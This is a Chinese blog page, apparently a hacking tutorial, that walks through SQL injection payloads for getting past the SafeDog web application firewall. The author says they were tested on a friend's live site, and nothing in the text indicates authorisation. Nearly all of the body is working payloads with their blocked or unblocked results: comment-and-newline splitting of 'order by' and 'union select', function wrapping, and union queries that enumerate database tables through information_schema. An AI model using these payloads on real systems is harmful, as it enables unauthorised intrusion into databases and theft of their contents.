小风福利公众号
扫描二维码
关注“外卖干饭精灵”公众号
领本站送出的无门槛20元外卖红包
回复“黑客”领取学习资料
最新文章
热门文章
文章详情
实战sql注入绕过安全狗
实战安全狗bypass
之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站
绕过 and 1=1
这种很显然直接被拦截,这里进行fuzz
and 1 like 1 拦截
and /!1=1/ 不拦截
and hex(1) 不拦截
%23%0a 1=1 拦截
绕过order by
发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截
安全狗他拦截哪里我们就绕哪里
order%23%0aby 1 不拦截
order /!by / 1拦截
order --+%0a by 拦截
一般安全狗这种对查询中间添加一些无用数据就不会拦截 order xxx by
order all by 1不拦截 但是这种查询语句就无效的,这里我们就要想办法给他给注释掉
order --+all%0a by 1 不拦截 且语句有效
绕过union select
还是单个union不拦截 单个select不拦截 只要union select 结合就被拦截,还是跟order by绕过一样添加数据绕过安全狗的匹配
union%23%0aselect 被拦截
union--+%0aselect 被拦截
union%23xxx%0aselect 不拦截
union-- xxx%0aselect 不拦截
union--+xxx%0aselect 不拦截
这里还有个绕过方法安全狗不会对/ /里面内容进行校验,可以从这里入手
/&ID=-17 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23/ 不拦截
这里就是通过一个注释符%23把后面 \/ 形成一个完整的sql语句,也可以通过其他注释符进行注释.
ID=-17 "/" union select 1,2,3,4,5,6,7,8,9,10,11,12,13 "/" 不拦截 ,但是这个前提条件对方不开gpc或者使用addslashes()函数要不然单双引号被转义
绕过系统函数
database() -->database/**/() database() -->database/*!()*/ user() --> user/**/() user() -->user/*!()*/
等等,基本上这个/**/就可以绕过了系统函数
绕过查询数据库表
如果这里我们使用联合查询第二种在里面进行查询的话,就不需要绕过直接构造正常语句就可以进行查询
?/*&ID=-17 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()%23*/
如果这里我们不使用上面那种方法,来进行绕过.
这里 使用%23njjknjk%0a来绕过union select , from information_schema.tables,这里面%23这里可以随意添加数据%0a,如果转义了单双号进行hex编码绕过
?ID=-17 union %23njjknjk%0a select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from%23njjknjk%0ainformation_schema.tables%23njjknjk%0awhere%20table_schema=0x73685f6a7a%20--+
上一文章:黑客自学书籍手册,黑客零基础入门书籍推荐,自学黑客技术的书
下一文章:程序员和黑客有什么区别?
相关推荐
- 03-30黑客为什么不攻击网贷平台?
- 06-04为什么fps会忽高忽低?有什么解决办法?
- 02-21黑客常用的5个攻击手段方法,你知道哪个?
- 05-31如何在外国连接中国网络呢?
- 01-01如何防止手机被黑客入侵?
- 05-31盘点世界上最出名的十大黑客(每个都能改变历
- 05-11媒体调查学位论文查重乱象(为降重导致论文面
- 05-26忘记电脑登录密码的处理方法!
- 10-10黑客到底是什么职业?最厉害的黑客有多牛?
- 06-19做一名黑客需要哪些技能?黑客入门知识
- 01-13程序员工资一般多少钱一个月?
- 12-07Linux逆向之hook注入代码
- 12-16网络安全自查报告怎么写?自查报告范文
- 06-19世界最著名的黑客大战,中美黑客大战